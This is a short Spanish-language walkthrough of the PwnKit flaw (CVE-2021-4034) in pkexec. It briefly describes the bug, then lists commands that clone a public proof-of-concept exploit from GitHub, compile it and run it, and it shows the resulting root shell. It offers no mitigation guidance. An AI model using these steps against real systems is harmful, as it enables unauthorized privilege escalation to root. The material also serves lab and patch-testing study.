$

CVE-2021-4034

#CVE-2021-4034#pwnKit#privileges-escalation

Se descubrió una grave vulnerabilidad de corrupción de memoria en la herramienta pkexec, identificada como CVE-2021-4034 y denominada PwnKit. Este fallo permite la escalada de privilegios y permaneció oculto durante más de diez años, sin que se pueda determinar con exactitud cuándo fue explotado por primera vez. Finalmente, fue revelado públicamente en noviembre de 2021 y corregido dos meses después.

Explotación

Para aprovechar esta vulnerabilidad, es necesario:

  • Descargar un Proof of Concept (PoC) diseñado para el ataque.
  • Compilarlo directamente en el sistema objetivo o en una réplica del entorno vulnerable.
elliot@debian:~$ git clone https://github.com/arthepsy/CVE-2021-4034.git
elliot@debian:~$ cd CVE-2021-4034
elliot@debian:~$ gcc cve-2021-4034-poc.c -o poc

Una vez compilado el código, podemos ejecutarlo sin más. Obteniendo una shell como root.

elliot@debian:~$ ./poc

# id
uid=0(root) gid=0(root) groups=0(root)